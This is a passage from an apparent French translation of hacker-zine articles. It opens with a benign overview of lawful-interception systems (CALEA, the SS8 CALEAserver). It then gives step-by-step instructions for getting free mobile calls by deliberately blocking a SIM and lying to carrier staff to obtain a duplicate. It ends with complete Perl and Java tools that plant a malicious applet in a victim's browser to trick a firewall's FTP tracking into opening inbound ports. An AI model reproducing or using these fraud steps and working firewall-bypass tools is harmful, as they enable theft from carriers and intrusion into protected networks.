La DF est responsable de la delivrance de communications intercepetees a une ou plusieurs Fonctions de Collection. Ceci est effectue sur deux types de canaux distingts : les Canaux de Contenu d'Appel (CCC) et les Canaux d'Appels de Donnees (CDC). Les CCC sont generalement utilises pour transporter du contenu d'appel comme la voix ou des communications de donnees. Les CCC sont soit "combines", c'est a dire qu'ils portent la transmission et la reception sur le meme canal, soit "separes", c'est a dire que la transmission et la reception sont portees sur des canaux separes. Les CDC sont generalement utilises pour transporter des messages qui dont le rapport est base sur du texte comme les Short Message Services (SMS). L'information dans les CDC est transmise en utilisant un protocole appele Lawfully Authorized Electronic Surveillance Protocol (LAESP).

----[ 4.3 La Fonction de Collection (CF)

La CF est responsable de la collecte et de l'analyse des communications interceptees et des informations d'identification de l'appel, et est la responsabilite des LEA.

----[ 4.4 La Fonction d'Administration de Fournisseur d'Acces (SPAF)

La SPAF est responsable du controle de l'Acces des TSP et des Fonctions de Delivrance.

----[ 4.5 La Fonction d'Administration de Maintient de l'Ordre (LEAF)

La LEAF est responsable du controle de la Fonction de Collection des LEAS et est la responsabilite des LEA.

A present que je vous ai presente la LEAS regardons une implementation de ceci, qui est actuellement sur le marche et est en usage chez quelques TSP :

Passage en revue du CALEAserver :

Le CALEAserver est manufacture par SS8 Networks. C'est une collection et systeme de delivrance pour des informations d'appel et
de contenu. Ca permet aux reseaux existants de devenir complement compatible CALEA. Ca permet a une LEA de monitorer les communications
sans ou avec fil, et de rassembler des informations a propos des appels, a distance. Le CALEAserver s'interface avec le reseau a travers Signaling System 7 (SS7) qui est une extension du Reseau de Telephone Public Commute (RTC) [Public Switched Telephone Network : PSTN]. Le CALEAserver est compose de trois couches majeures : la Couche Plate-forme Materielle, le Couche Plate-forme Reseau et la couche Application Logicielle.

La Couche Plate-forme Materielle consiste en la Matrice de Commutation et la Plate-forme de Calcul. La Matrice de Commutation est un commutateur programmable industriel standard. Il contient des cartes T1 pour la transmission de voix et des connections croisees entre les commutateurs, des cartes DSP pour les circuits de conferance requis pour l'interception et la reception/generation DTMF, et des cartes CPU pour la gestion du switch. La Plate-forme de Calcul est une machine simple basee sur UNIX, montee en rack. Elle est utilisee pour lancer le logiciel d'application du CALEAserver qui fournit les capacites de Fonction de Delivrance et controle la Matrice de Commutation.

La Couche Plate-forme Reseau fournit les capacites de SS7 aussi bien que le les API de traitement d'appel pour la Couche d'Application Logicielle. Ca controle egalement la Matrice de Commutation.

La Couche d'Application Logicielle est la ou les Fonctions de Delivrance et d'Administration de Fournisseur de Service sont supportees. Ca isole les interfaces des Fonctions d'Acces et de Collection, de la principale fonctionnalite de delivrance permttant de multiples Fonctions d'Acces et de Collection a travers les Modules d'Interface qui peuvent etre ajoutes ou modifies sans impact sur les fonctionnalites existantes.

Capacites du systeme :

Configurable pour jusqu'a :

1000 Fonctions de Collection
128 Interfaces de Fonctions d'Acces
32 liens SS7
512 interceptions de contenu d'appel simultanees sur une unique base d'appel
64 equipements de T1 voix

Environnment operationel :

Compatible NEBS, -48 volt, equipement monte en rack 19"
Processeur UltraSPARC de derniere generation
Bus PCI 66 MHz
Systeme d'exploitation UNIX Solaris
Disques de 9 giga-octets, SCSI 40 Mo/s
512 Mo de RAM standard
Ethernet/Fast Ethernet, 10-BaseT and 100-BaseT
Deux ports serie RS-232C/RS-423
Commutateur programmable et scalable avec jusqu'a 4000 port time slot interchange

Caracteristiques :

Outils de tests inclus pour le test a distance
Systeme de gestion SS7 total
Rapport d'alarmes et logging des erreurs
Recuperation automatique des erreurs logicielles
Sauvegarde des disque automatique ou manuelle
Support de SNMP
Support optionel de X.25 et autres interfaces de fonctions de collection
Standart ITU MLL et support des GUI basees sur Java
Support des reseaux circuit-switched et packet-switched
Support optionel pour d'autres interfaces de fonction d'acces comme requis pour la compatibilite CALEA, incluant :
*HLR (Home Location Register)
*VMS (Voice Mail System : messagerie vocale)
*SMS (Short Message System)
*CDPD wireless data
*Centre d'authentification
*Approvinionnement d'acces a distance


Ceci conclut l'introduction a LAES. Ceci n'etant qu'une introduction, j'ai laisse tomber braucoup de details comme les informations sur le protocole. Cependant, si vous etes interesses pour en lire plus sur LAES je vous suggererai de lire le standard TIA J-STD-025A. J'espere que vous pourez en lire un peu plus a propos des possibilites de surveillance des LEA. Si vous avez des questions soyez libres de me contacter. Adresse e-mail : voir plus haut.
 


--[ 3 - Appels gratuits depuis un mobile

        par eurinomo

 
Ce bug peut être utilisé pour appeler gratuitement, envoyer gratuitement des SMS, et avoir les fonctionnalités wap gratuites.

    Premièrement, vous devez voir si votre opérateur mobile est vulnérable  au bug ou non. Appelez juste le service d'appel gratuit (pour ne pas
gaspiller de l'argent) et dites leur que votre carte (sim) est bloquée, que vous avez oublié votre téléphone dans la chambre de votre petite sœur et que votre mobile affiche " Carte sim bloqué " ou quelques chose dans ce goût là. Dites leur que votre sœur à probablement faussé le puk parce le téléphone était sur off, et que maintenant il est allumé. Ensuite le mec va dire qu'il faut que vous vous rendiez dans un magasin de téléphonie mobile, que vous devez leurs exposer le problème, et qu'ensuite ils vous donneront une autre carte avec le même numéro, et le même crédit que l'ancienne possédée. Demandez-leur combien tout cela va vous coûter et le mec va vous dire que c'est gratuit ! :-)

Maintenant le matériel dont vous avez besoin:
- Un téléphone mobile qui n'est pas un Nokia (c'est mieux qu'il soit à vous, et qu'il ne soit pas débloqué)
- Et un Nokia (peut être débloqué, volé ou emprunté. Faites ce que vous voulez !)

Comment procéder :

Mobile1 =  Non Nokia
Mobile2 =  Nokia

Insérez la carte dans le mobile1 et entrez votre pin. Lorsque le téléphone démarre tapez ce code 3 fois :
**04*00000000*00000000*00000000#
ou essayer
**05*00000000*00000000*00000000#

    Consultez le manuel et chercher le code nécessaire pour changer le puk si les exemples précédents ne fonctionnent pas, ou envoyer un e-mail
à Motorola, dites-leur que votre mobile est un Motorola, et que vous souhaitez changer le puk et que vous savez qu'il faut changer un code (ce code n'est pas illégal et il est aussi spécifié dans le manuel).

    Si le code n'est pas le premier que j'ai donné plus haut, c'est à près. Si vous avez une erreur motorola lorsque vous tapez **04** ou **05** 
il va vous indiquer " entrez l'ancien puk " (ou quelque chose comme çà) automatiquement et ensuite demandez le nouveau code puk deux foix. Mais
le plus important dans cette histoire c'est de bloquer votre carte, je pense que vous pouvez également le faire si vous entrez un code pin erroné trois
fois de suite, et qu'ensuite vous entrez un puk erroné et...c'est bloqué ! Mais ce que je viens de dire à propos du code n'a pas été testé,  vous pouvez
essayer ce dernier système également, à vos propres risques.

    Maintenant allez dans le magasin de téléphonie mobile et racontez leurs ce qui s'est passé (votre petite sœur, ou une fille d'un ami de votre mère, enfin quelque chose comme çà ...). Ensuite, ils vont dupliquer la carte et ils vont vous donner la nouvelle *et* l'ancienne. A la fin, ils vous donnent normalement les deux. (NDT : ou prétextez pour avoir les deux...)

    Maintenant la partie facile. Insérez l'ancienne carte dans le nokia, allumez-le et vous voyez que la carte n'est pas bloquée !!!! et si vous insérez la carte dans un autre phone (non Nokia), vous verrez que c'est bloqué. Le bug est plus un " bug Nokia " qu'un " bug réseau ". Maintenant  envoyez un SMS avec l'ancienne carte et regardez si votre crédit baisse. Ensuite regardez si le crédit a été décompté de la nouvelle carte ; si ce n'est pas le cas c'est parce que le réseau est vulnérable au bug et vous ne perdrez pas de tunes de votre ancienne carte. Toutefois vous avez seulement deux semaines ou moins avant qu'ils coupent complètement la ligne du réseau, et que ce soit complètement bloqué, mais la nouvelle carte aura le même crédit que l'ancienne, et vous pouvez répéter l'opération encore et encore.... Je ne pense pas qu'il vous attraperont (NDT : hum...)

Cette technique à été testée au Portugal sur le réseau GSM " Vodafone "


--[ 5 - Java traverse le firewall

Récemment il y a eu beaucoup de bruit autour du fait qu'il y a beaucoup d'insécurités dans les firewalls qui supporte le traçage de sessions FTP.
Elles peuvent être dupées lorsque quelqu'un ouvre une session FTP en utilisant une seconde pile TCP par exemple. Je vous recommande le CERT pour une dossier complet. Il y a eu d'autres techniques comme certains tags intégrés dans des fichiers html qui font ouvrir au butineur des connections qu'un firewall peut interpréter comme une session FTP.

Jetons un oeil sur l'exemple suivant :

[ Compagnie ] ---- [ firewall ] --- [des routeurs ] --- [ WEB ]

Une personne de 'compagnie' surfe sur le web et doit passer ses paquets au travers du routeur qui n'est pas sous le contrôle de 'compagnie' mais de l'attaquant. Scénario ordinaire non ?

Quelques outils a été compilé pour circonvenir à une telle installation. Je voulais également dire, pour autant que vous activiez un traçage vous
êtes perdu. Tous les chemins mènent à Rome ;)

Laissez-moi vous expliquez ces petit outils vite fait.

Html-redirect : l'attaquant installe ceci sur un routeur et fixe une règle de redirection sur le port 8888.

Class-inject : L'attaquant démarre ceci avec eftepe.class. html-redirect va rediriger les requêtes html à ce mini-httpd. Il force le butineur à l'intérieur de la compagnie qui est protégé par le firewall, à charger l'applet java. Ce dernier simule des sessions FTP actives à un routeur et est autorisé parce que des managers de sécurité voient un routeur comme l'origine de eftepe.class. Le firewall va ensuite ouvrir le port 7350 entrant, et ainsi vous pourrez vous connecter sur le routeur:20 à la company:7350.

ftpd : L'attaquant doit démarrer ceci sur un routeur pour simuler une session FTP.

Createclass : Le script pour créer le code java correct qui utilise l'ip appropriée (d'un routeur) et du port (de 'company') ensuite l'attaquant peut aussi prendre place sur le web (c'est à dire phrack.org :) et intègrent des applets java malicieux. Ainsi prenez garde car X fonctionne sur le port 6000. :-)

C'est vraiment très simple, et tout ceci ne vaut pas vraiment un article, c'est pourquoi vous allez trouver plus bas un add-on.

<classinject>
#!/usr/bin/perl -w

# Met un fichier class dans le butineur distant
#

use IO::Socket;

sub usage
{
print "Usage: $0 <class file>\n\n";
exit;
}

my $classfile = shift || usage();
my $class;
my $classlen = (stat($classfile))[7];
open I, "<$classfile" or die $!;
read I, $class, $classlen;
close I;

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 8080,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
next unless $conn = $sock->accept();
if (fork() > 0) {
$conn->close();
next;
}
my $request = <$conn>;
if ($request =~ /$classfile/) {
my $classcontent = "HTTP/1.0 200 OK\r\n".
 "Server: Apache/1.3.6 (Unix)\r\n".
 "Content-Length: $classlen\r\n".
 "Content-Type: application/octet-stream\r\n\r\n".$class;
print $conn $classcontent;
print "Injected to ", $conn->peerhost(), "\n";
} else {
print $conn "<HTML>".
            "<APPLET CODE=\"$classfile\" WIDTH=1 HEIGHT=1>".
            "</APPLET></HTML>\r\n\r\n";
}
$conn->close();
exit(0);
}
</classinject>
<createclass>
#!/usr/bin/perl -w

$ENV{"PATH"} = $ENV{"PATH"}."/usr/lib/java/bin";

print "Creating apropriate Java class-file for opeing port > 1023\n";
print "Enter IP to connect to on port 21 (e.g. '127.0.0.1'):";
my $ip = <STDIN>; chop($ip);
print "Enter port to open:";
my $port = <STDIN>; chop($port);
my $p1 = int $port/256;
my $p2 = $port%256;

open O, ">eftepe.java" or die $!;
print O<<EOF;

import java.io.*;
import java.applet.*;
import java.util.*;
import java.net.*;

public class eftepe extends Applet {

public void init()
{
try {
Socket s = new Socket("$ip", 21);
OutputStream os = s.getOutputStream();
BufferedReader in = new BufferedReader(new InputStreamReader(s.getInputStream()));
PrintWriter pw = new PrintWriter(os, true);
in.readLine();
pw.println("USER ftp\\r\\n");
in.readLine();
pw.println("PASS ftp\\r\\n");
in.readLine();
String port = new String("PORT ");
String me = InetAddress.getLocalHost().getHostAddress();
port += me.replace('.', ',');
port += ",$p1,$p2\\r\\n";
pw.println(port);
for(;;);
} catch (Exception e) {
e.printStackTrace();
}
}

}
EOF

print "Compiling into classfile...\n";
system("javac eftepe.java");
print "Done. Results are in eftepe.class\n";

</createclass>

<ftpd>
#!/usr/bin/perl -w

use IO::Socket;

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 21,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
$conn = $sock->accept();
if (fork() > 0) {
$conn->close();
next;
}
print $conn "220 ready\r\n";
<$conn>;  # user
print $conn "331 Password please\r\n";
<$conn>;  # pass
print $conn "230 Login successful\r\n";
<$conn>;  #port
print $conn "200 PORT command successful.\r\n";
sleep(36);
$conn->close();
exit 0;
}
</ftpd>

<html-redirect>
#!/usr/bin/perl -w

# Simple HTTP Redirector
#

# iptables -A PREROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-port 8888

use IO::Socket;

sub usage
{
print "Usage: $0 <IP|Host>\n".
      "\t\tIP|Host -- IP or Host to redirect HTML reuests to\n\n";
exit;
}

my $r = shift || usage();
my $redir = "HTTP/1.0 301 Moved Permanently\r\n".
            "Location: http://$r:8080\r\n\r\n";

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 8888,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
next unless $conn = $sock->accept();
if (fork() > 0) {
$conn->close();
next;
}
my $request = <$conn>;
print $conn "$redir";
$conn->close();
exit(0);
}
</html-redirect>

<testconnect>
#!/usr/bin/perl -w

use IO::Socket;

sub usage
{
print "Usage: $0 <Host> <Port>\r\n";
exit 0;
}

my $a = shift || usage();
my $b = shift || usage();

my $conn = IO::Socket::INET->new(PeerAddr => $a,
                                 PeerPort => $b,
                                 LocalPort => 20,
                                 Type => SOCK_STREAM,
                                 Proto => 'tcp') or die $!;

print $conn "GOTCHA\r\n";
$conn->close();
</testconnect>

<conntrack-start>
#!/bin/sh

# sample FTP session tracked firewall for 2.4 linux kernels
# modprobe ip_conntrack_ftp

iptables -F

iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 20 -m state --state ESTABLISHED -j ACCEPT

#iptables -A INPUT -p tcp --syn -j LOG
iptables -A INPUT -p tcp --syn -j DROP
</conntrack-start>

|=[ EOF ]=---------------------------------------------------------------=|